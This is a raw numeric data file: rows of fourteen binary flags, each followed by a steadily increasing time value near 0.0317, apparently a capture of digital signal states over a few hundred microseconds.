0,0,0,0,0,0,1,0,0,0,1,0,1,0,3.1660068e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,3.1660092e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,3.1660116e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,3.1660144e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,3.1660172e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,3.1660192e-02 0,0,0,0,0,0,0,0,0,0,1,0,0,0,3.1660200e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1660204e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1660220e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1660244e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1660268e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1660292e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1660316e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1660344e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,3.1660348e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,3.1660372e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,3.1660396e-02 0,0,0,0,0,0,0,0,0,0,1,0,0,0,3.1660400e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1660404e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1660420e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1660444e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1660468e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1660492e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1660520e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1660544e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1660572e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1660596e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1660620e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1660644e-02 0,0,0,0,0,0,1,0,0,0,0,0,0,0,3.1660648e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,3.1660652e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,3.1660668e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,3.1660692e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1660700e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1660720e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1660744e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,3.1660748e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,3.1660772e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,3.1660796e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,3.1660820e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,3.1660844e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,3.1660868e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,3.1660892e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1660900e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1660920e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1660944e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1660972e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1660996e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1661020e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1661044e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1661068e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1661092e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1661120e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1661144e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1661172e-02 0,0,0,0,0,0,1,0,0,0,0,0,0,0,3.1661196e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,3.1661200e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,3.1661220e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,3.1661244e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1661252e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1661268e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1661292e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1661316e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1661344e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1661372e-02 0,0,0,0,0,0,1,0,0,0,0,0,0,0,3.1661396e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,3.1661400e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,3.1661420e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,3.1661444e-02 0,0,0,0,0,0,0,0,0,0,1,0,0,0,3.1661448e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1661452e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1661468e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1661492e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1661516e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1661540e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1661572e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1661592e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1661620e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1661644e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1661668e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1661692e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1661716e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1661740e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1661772e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1661792e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1661820e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1661844e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1661868e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1661892e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1661916e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1661940e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1661972e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1661992e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1662020e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1662044e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1662068e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1662092e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1662116e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1662140e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1662172e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1662192e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1662220e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1662244e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1662268e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1662292e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1662316e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1662340e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1662372e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1662392e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1662420e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1662444e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1662468e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1662492e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1662516e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1662540e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1662572e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1662592e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1662620e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1662644e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1662668e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1662692e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1662716e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1662740e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1662772e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1662792e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1662820e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1662844e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1662868e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1662892e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1662916e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1662940e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1662972e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1662992e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1663020e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1663044e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1663068e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1663092e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1663116e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1663140e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1663172e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1663192e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1663220e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1663244e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1663268e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1663292e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1663316e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1663340e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1663372e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1663392e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1663420e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1663444e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1663468e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1663492e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1663516e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1663540e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1663572e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1663592e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1663620e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1663644e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1663668e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1663692e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1663716e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1663740e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1663772e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1663792e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1663820e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1663844e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1663868e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1663892e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1663916e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1663940e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1663972e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1663992e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1664020e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1664044e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1664068e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1664092e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1664116e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1664144e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1664172e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1664196e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1664220e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1664244e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1664268e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1664292e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1664320e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1664344e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1664372e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1664396e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1664420e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1664444e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1664468e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1664492e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1664520e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1664544e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1664572e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1664596e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1664620e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1664644e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1664668e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1664692e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1664720e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1664744e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1664772e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1664796e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1664820e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1664844e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1664868e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1664892e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1664920e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1664944e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,3.1789892e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,1,3.1790124e-02 1,0,0,0,0,0,0,0,0,0,0,1,0,1,3.1790152e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,1,3.1790176e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,1,3.1790492e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,1,3.1790516e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,1,3.1790568e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,1,3.1790592e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,1,3.1790640e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,1,3.1790668e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,1,3.1790716e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1790724e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1790740e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1790796e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1790820e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1790868e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1790892e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1790916e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1790940e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1790996e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1791020e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1791068e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1791092e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1791140e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1791168e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1791220e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1791244e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1791292e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1791316e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1791368e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1791392e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1791416e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1791440e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1791464e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1791492e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1791540e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1791564e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1791616e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1791640e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1791692e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1791716e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1791764e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1791788e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1791816e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1791840e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1791864e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1791892e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1791940e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1791964e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1792016e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1792040e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1792092e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1792116e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1792164e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1792188e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1792240e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1792268e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1792316e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1792340e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1792364e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1792388e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1792412e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1792440e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1792464e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1792492e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1792516e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1792540e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1792568e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1792592e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1792620e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1792644e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1792668e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1792692e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1792716e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1792740e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1792796e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1792820e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1792868e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1792892e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1792944e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1792968e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1793020e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1793044e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1793092e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1793116e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1793140e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1793168e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1793192e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1793220e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1793244e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1793268e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1793292e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1793316e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1793340e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1793368e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1793392e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1793420e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1793468e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1793500e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1793524e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1793548e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1793572e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1793596e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1793620e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1793648e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1793672e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1793700e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1793724e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1793748e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1793772e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1793796e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1793820e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1793848e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1793872e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1793900e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1793924e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1793948e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1793972e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1793996e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1794020e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1794048e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1794072e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1794100e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1794124e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1794148e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1794172e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1794196e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1794220e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1794248e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1794272e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1794300e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1794348e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1794372e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1794396e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1794420e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1794448e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1794472e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1794500e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1794524e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1794548e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1794572e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1794596e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1794620e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1794648e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1794672e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1794700e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1794724e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1794748e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1794772e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1794824e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1794848e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1794900e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1794924e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1794948e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1794972e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1794996e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1795020e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1795048e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1795072e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1795100e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1795128e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1795180e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1795204e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1795252e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1795276e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1795328e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1795352e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1795404e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1795428e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1795476e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1795500e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1795528e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1795552e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1795580e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1795604e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1795628e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1795652e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1795676e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1795700e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1795728e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1795752e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1795780e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1795804e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1795828e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1795852e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1795876e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1795900e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1795956e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1795980e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1796004e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1796028e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1796052e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1796076e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1796100e-02 